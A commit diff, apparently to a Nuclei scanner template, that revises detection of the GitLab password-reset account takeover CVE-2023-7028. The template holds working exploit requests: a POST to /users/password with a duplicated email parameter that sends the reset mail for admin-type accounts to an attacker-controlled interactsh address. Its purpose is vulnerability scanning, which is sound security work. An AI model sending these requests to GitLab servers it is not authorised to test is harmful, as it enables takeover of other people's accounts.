misc updates
parent
aab1f47ba1
commit
16b6079a48
|
@ -1,7 +1,7 @@
|
|||
id: CVE-2023-7028
|
||||
|
||||
info:
|
||||
name: GitLab Account Takeover via Password Reset without user interactions
|
||||
name: GitLab - Account Takeover via Password Reset
|
||||
author: DhiyaneshDk,rootxharsh,iamnooob,pdresearch
|
||||
severity: critical
|
||||
description: |
|
||||
|
@ -9,6 +9,13 @@ info:
|
|||
reference:
|
||||
- https://about.gitlab.com/releases/2024/01/11/critical-security-release-gitlab-16-7-2-released/
|
||||
- https://x.com/rwincey/status/1745659710089437368?s=20
|
||||
- https://gitlab.com/gitlab-org/gitlab/-/issues/436084
|
||||
- https://hackerone.com/reports/2293343
|
||||
classification:
|
||||
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:N
|
||||
cvss-score: 10
|
||||
cve-id: CVE-2023-7028
|
||||
cwe-id: CWE-284
|
||||
metadata:
|
||||
verified: true
|
||||
max-request: 2
|
||||
|
@ -16,9 +23,9 @@ info:
|
|||
product: gitlab
|
||||
shodan-query: title:"Gitlab"
|
||||
tags: cve,cve2023,gitlab,auth-bypass
|
||||
|
||||
flow: |
|
||||
http(1);
|
||||
set("token", template["token"][0]);
|
||||
http(2);
|
||||
|
||||
http:
|
||||
|
@ -27,25 +34,8 @@ http:
|
|||
GET /users/sign_in HTTP/1.1
|
||||
Host: {{Hostname}}
|
||||
|
||||
- |
|
||||
@timeout: 30s
|
||||
POST /users/password HTTP/1.1
|
||||
Host: {{Hostname}}
|
||||
Origin: {{RootURL}}
|
||||
Content-Type: application/x-www-form-urlencoded
|
||||
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
|
||||
Referer: {{RootURL}}/users/password/new
|
||||
|
||||
authenticity_token={{token}}&user[email][]=admin@example.com&user[email][]=nuclei@{{interactsh-url}}
|
||||
|
||||
matchers:
|
||||
- type: dsl
|
||||
dsl:
|
||||
- "contains(interactsh_protocol, 'smtp')"
|
||||
|
||||
extractors:
|
||||
- type: regex
|
||||
part: body
|
||||
name: token
|
||||
group: 1
|
||||
regex:
|
||||
|
@ -54,24 +44,29 @@ http:
|
|||
|
||||
- raw:
|
||||
- |
|
||||
@timeout: 30s
|
||||
@timeout: 20s
|
||||
POST /users/password HTTP/1.1
|
||||
Host: {{Hostname}}
|
||||
Origin: {{RootURL}}
|
||||
Content-Type: application/x-www-form-urlencoded
|
||||
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
|
||||
Referer: {{RootURL}}/users/password/new
|
||||
|
||||
authenticity_token={{token}}&user[email][]={{username}}@{{RDN}}&user[email][]=nuclei@{{interactsh-url}}
|
||||
authenticity_token={{token}}&user[email][]={{username}}&user[email][]={{rand_base(6)}}@{{interactsh-url}}
|
||||
|
||||
payloads:
|
||||
username:
|
||||
- admin
|
||||
- root
|
||||
- gitlab
|
||||
- git
|
||||
- admin@example.com
|
||||
- admin@{{RDN}}
|
||||
- root@{{RDN}}
|
||||
- gitlab@{{RDN}}
|
||||
- git@{{RDN}}
|
||||
|
||||
matchers:
|
||||
- type: dsl
|
||||
dsl:
|
||||
- "contains(interactsh_protocol, 'smtp')"
|
||||
- contains(interactsh_protocol, 'smtp')
|
||||
|
||||
extractors:
|
||||
- type: dsl
|
||||
dsl:
|
||||
- username
|
||||
|
|
Loading…
Reference in New Issue